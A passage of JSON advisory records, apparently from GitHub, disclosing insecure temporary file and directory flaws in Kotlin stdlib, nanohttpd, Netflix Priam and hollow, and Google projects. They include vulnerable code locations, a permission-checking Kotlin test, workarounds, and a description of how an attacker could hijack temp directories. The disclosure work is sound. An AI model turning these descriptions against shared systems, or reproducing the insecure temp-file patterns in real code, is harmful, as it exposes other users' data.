"https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-7fjx-657r-9r5h", "type": "GHSA" }, { "value": "CVE-2021-22571", "type": "CVE" } ], "state": "published", "created_at": "2022-02-04T21:54:20Z", "updated_at": "2022-03-30T13:03:08Z", "published_at": "2022-03-09T16:50:35Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "application", "name": "google / sa360-webquery-bigquery" }, "vulnerable_version_range": "<= v1.0.2", "patched_versions": "v1.0.3", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "score": 5.5 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" } ], "cwe_ids": [ "CWE-377" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-22c6-wcjm-qfjg", "cve_id": "CVE-2021-22572", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-22c6-wcjm-qfjg", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-22c6-wcjm-qfjg", "summary": "Insecure Temporary File in google / data-transfer-project", "description": "### Impact\r\n\r\nInformation downloaded with the `google/data-transfer-project` may expose downloaded information to other local users.\r\n\r\n### Prerequisites\r\n\r\nThis vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.\r\n\r\n### Patches\r\n\r\nUpdates to version 0.3.57 or higher.\r\n\r\n### Additional Information\r\n - https://github.com/google/data-transfer-project/issues/968\r\n\r\n### Workarounds\r\n\r\nSetting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems.\r\n", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-22c6-wcjm-qfjg", "type": "GHSA" }, { "value": "CVE-2021-22572", "type": "CVE" } ], "state": "published", "created_at": "2022-02-04T21:43:29Z", "updated_at": "2022-03-30T13:02:44Z", "published_at": "2022-03-09T16:39:35Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "none", "name": "google / data-transfer-project" }, "vulnerable_version_range": "< 0.3.57", "patched_versions": "0.3.57", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "score": 5.0 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" } ], "cwe_ids": [ "CWE-377" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-5w9v-8x7x-rfqm", "cve_id": "CVE-2020-29582", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-5w9v-8x7x-rfqm", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-5w9v-8x7x-rfqm", "summary": "CWE-378/CWE-379: Kotlin StdLib - Creation of Temporary File/Directory With Insecure Permissions", "description": "### Impact\r\nKotlin Stdlib is vulnerable to CWE-378 - Insecure Temporary File & \tCWE-379 - Creation of Temporary File in Directory with Insecure Permissions.\r\n\r\nThese are the two vulnerable locations:\r\n\r\n- https://github.com/JetBrains/kotlin/blob/9b157fd291d581a30a3194940b0ebbb95a2fd247/libraries/stdlib/jvm/src/kotlin/io/files/Utils.kt#L14-L39\r\n - https://github.com/JetBrains/kotlin/blob/9b157fd291d581a30a3194940b0ebbb95a2fd247/libraries/stdlib/jvm/src/kotlin/io/files/Utils.kt#L41-L60\r\n\r\nHere is a simple unit test that demonstrates the vulnerability.\r\n\r\n```kotlin\r\npackage org.jlleitschuh.sandbox\r\n\r\nimport org.junit.jupiter.api.Test\r\nimport java.io.BufferedReader\r\nimport java.io.File\r\nimport java.io.IOException\r\nimport java.io.InputStreamReader\r\nimport java.nio.file.Files\r\n\r\nclass KotlinTempDirectoryPermissionCheck {\r\n @Test\r\n fun `kotlin check default directory permissions`() {\r\n val dir = createTempDir()\r\n runLS(dir.parentFile, dir) // Prints drwxr-xr-x\r\n }\r\n\r\n @Test\r\n fun `Files check default directory permissions`() {\r\n val dir = Files.createTempDirectory(\"random-directory\")\r\n runLS(dir.toFile().parentFile, dir.toFile()) // Prints drwx------\r\n }\r\n\r\n @Test\r\n fun `kotlin check default file permissions`() {\r\n val file = createTempFile()\r\n runLS(file.parentFile, file) // Prints -rw-r--r--\r\n }\r\n\r\n @Test\r\n fun `Files check default file permissions`() {\r\n val file = Files.createTempFile(\"random-file\", \".txt\")\r\n runLS(file.toFile().parentFile, file.toFile()) // Prints -rw-------\r\n }\r\n\r\n private fun runLS(file: File, lookingFor: File) {\r\n val processBuilder = ProcessBuilder()\r\n processBuilder.command(\"ls\", \"-l\", file.absolutePath)\r\n try {\r\n val process = processBuilder.start()\r\n val output = StringBuilder()\r\n val reader = BufferedReader(\r\n InputStreamReader(process.inputStream)\r\n )\r\n reader.lines().forEach { line ->\r\n if (line.contains(\"total\")) {\r\n output.append(line).append('\\n')\r\n }\r\n if (line.contains(lookingFor.name)) {\r\n output.append(line).append('\\n')\r\n }\r\n }\r\n val exitVal = process.waitFor()\r\n if (exitVal == 0) {\r\n println(\"Success!\")\r\n println(output)\r\n } else {\r\n //abnormal...\r\n }\r\n } catch (e: IOException) {\r\n e.printStackTrace()\r\n } catch (e: InterruptedException) {\r\n e.printStackTrace()\r\n }\r\n }\r\n}\r\n```\r\n\r\nA Kotlin application using createTempDir or createTempFile and placing sensitive information within either of these locations would be leaking this information in a read-only way to other users also on this system.\r\n\r\n### Prerequisites\r\n\r\nThis vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.\r\n\r\n### Patches\r\n\r\nThere are no patched versions with this vulnerability fixed. All versions remain vulnerable. However, the impacted methods have been deprecated.\r\n\r\nTo fully mitigate this vulnerability, ensure your code and all dependencies don't use the `createTempFile` or `createTempFile` methods offered by the Kotlin standard library.\r\n\r\n### Workarounds\r\n\r\nSetting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems and all Kotlin versions.\r\n\r\nDepending upon the version of android you are using, this may also impact you. See the following resource: https://github.com/google/guava/issues/4011#issuecomment-772892561\r\n\r\n### References\r\n\r\nJetBrains does a really terrible job with fully disclosing the details of their own vulnerabilities unfortunately.\r\n\r\n - https://blog.jetbrains.com/blog/2021/02/03/jetbrains-security-bulletin-q4-2020/\r\n \r\n### For more information\r\n\r\nReach out to Jetbrains: security@jetbrains.com\r\n", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-5w9v-8x7x-rfqm", "type": "GHSA" }, { "value": "CVE-2020-29582", "type": "CVE" } ], "state": "published", "created_at": "2022-02-03T19:40:43Z", "updated_at": "2022-02-03T20:42:27Z", "published_at": "2022-02-03T19:51:08Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": " org.jetbrains.kotlin:kotlin-stdlib" }, "vulnerable_version_range": "> 0", "patched_versions": "None", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "score": 5.5 }, "cwes": [ { "cwe_id": "CWE-378", "name": "Creation of Temporary File With Insecure Permissions" }, { "cwe_id": "CWE-379", "name": "Creation of Temporary File in Directory with Insecure Permissions" } ], "cwe_ids": [ "CWE-378", "CWE-379" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-2r85-x9cf-8fcg", "cve_id": "CVE-2022-21230", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-2r85-x9cf-8fcg", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-2r85-x9cf-8fcg", "summary": "Creation of Temporary File With Insecure Permissions in org.nanohttpd:nanohttpd", "description": "### Patches\r\n\r\nNo patches are available. The maintainers have been unresponsive. It may be appropriate to consider this project unmaintained at this point.\r\n\r\n### Impact\r\n\r\nThe `org.nanohttpd.protocols.http.tempfiles.DefaultTempFileManager` & `org.nanohttpd.protocols.http.tempfiles.DefaultTempFile` contain a local temporary file information disclosure vulnerability. On Unix like systems, the system's temporary directory is shared between all users on that system. As such, files written to that directory without setting the correct file permissions can allow other users on that system to view the contents of the files written to those temporary files.\r\n\r\n#### Vulnerability Locations\r\n\r\n - https://github.com/NanoHttpd/nanohttpd/blob/efb2ebf85a2b06f7c508aba9eaad5377e3a01e81/core/src/main/java/org/nanohttpd/protocols/http/tempfiles/DefaultTempFile.java#L58\r\n - https://github.com/NanoHttpd/nanohttpd/blob/efb2ebf85a2b06f7c508aba9eaad5377e3a01e81/core/src/main/java/org/nanohttpd/protocols/http/tempfiles/DefaultTempFileManager.java#L60\r\n\r\nWhenever an HTTP Session is parsing the body of an HTTP request, the body of the request is written to a RandomAccessFile when the body is larger than 1024 bytes. Unfortunately, RandomAccessFile is created using a temporary file which is created with file permissions that allow it's contents to be viewed by all users on the host machine.\r\n\r\nhttps://github.com/NanoHttpd/nanohttpd/blob/efb2ebf85a2b06f7c508aba9eaad5377e3a01e81/core/src/main/java/org/nanohttpd/protocols/http/HTTPSession.java#L611-L617\r\n\r\n### Workarounds\r\n\r\nManually specifying the `-Djava.io.tmpdir=` argument when launching Java to set set the temporary directory to a directory exclusively controlled by the current user can fix this issue.\r\n\r\n### References\r\n - https://security.snyk.io/vuln/SNYK-JAVA-ORGNANOHTTPD-2422798\r\n", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-2r85-x9cf-8fcg", "type": "GHSA" }, { "value": "CVE-2022-21230", "type": "CVE" } ], "state": "published", "created_at": "2022-01-28T02:33:00Z", "updated_at": "2022-04-06T18:38:01Z", "published_at": "2022-04-06T18:38:01Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "org.nanohttpd:nanohttpd" }, "vulnerable_version_range": "<=2.3.1", "patched_versions": "None", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "score": 5.5 }, "cwes": [ { "cwe_id": "CWE-378", "name": "Creation of Temporary File With Insecure Permissions" } ], "cwe_ids": [ "CWE-378" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-6m9h-r5m3-9r7f", "cve_id": null, "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-6m9h-r5m3-9r7f", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-6m9h-r5m3-9r7f", "summary": "REDACTED", "description": "REDACTED", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": null, "identifiers": [ { "value": "GHSA-6m9h-r5m3-9r7f", "type": "GHSA" } ], "state": "closed", "created_at": "2022-01-20T23:27:50Z", "updated_at": "2023-02-27T19:48:30Z", "published_at": null, "closed_at": "2023-02-27T19:48:30Z", "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": " ", "name": "REDACTED" }, "vulnerable_version_range": "3.16", "patched_versions": "", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "score": 6.5 }, "cwes": [ { "cwe_id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" } ], "cwe_ids": [ "CWE-22" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-f4jh-ww96-9h9j", "cve_id": "CVE-2021-28100", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-f4jh-ww96-9h9j", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-f4jh-ww96-9h9j", "summary": "Netflix/Priam: Temporary Directory Information Disclosure", "description": "### Impact\r\n\r\nWhen `File.createTempFile` creates a file, the permissions on that file are -rw-r--r--. This means that other users can read the contents of these files after they are written, although they can not modify the contents. This allows for local information disclosure if these files contain sensitive information.\r\n\r\nVulnerable locations:\r\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/backup/MetaData.java#L106-L111\r\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/identity/DoubleRing.java#L109-L118\r\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/restore/PostRestoreHook.java#L80-L86\r\n\r\n---\r\n\r\nThe custom CodeQL queries leveraged to find these this as well as their results can be found here:\r\n\r\nhttps://lgtm.com/query/1543383251073929777/\r\nhttps://lgtm.com/query/3142895023158674709/\r\n\r\n## Official Disclosure\r\n\r\nhttps://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2021-002.md\r\n\r\n## Fix\r\n\r\nThere are no fixed versions.", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-f4jh-ww96-9h9j", "type": "GHSA" }, { "value": "CVE-2021-28100", "type": "CVE" } ], "state": "published", "created_at": "2021-03-22T23:38:20Z", "updated_at": "2021-03-30T14:57:18Z", "published_at": "2021-03-30T14:57:18Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "", "name": "Netflix/Priam" }, "vulnerable_version_range": "All", "patched_versions": "None", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "score": 6.2 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" } ], "cwe_ids": [ "CWE-377" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-j83w-7qr9-wv86", "cve_id": "CVE-2021-28099", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-j83w-7qr9-wv86", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-j83w-7qr9-wv86", "summary": "Netflix/hollow: Temporary directory hijacking", "description": "### Impact\r\nTemporary directory hijacking.\r\n\r\nThis vulnerability exists because Netflix/hollow will use files/directories that already exist on the system without first checking their permissions.\r\n\r\nThis vulnerability can be seen here:\r\nhttps://github.com/Netflix/hollow/blob/eeefe2454ed2efce60b8971e1a02d8f7375ea7fb/hollow/src/main/java/com/netflix/hollow/api/producer/fs/HollowFilesystemBlobStager.java#L112-L140\r\n\r\nSince the Files.exists(parent) is run before creating the directories, an attacker can pre-create these directories with wide permissions.\r\n\r\nAdditionally, since an insecure source of randomness is used, the file names to be created can be deterministically 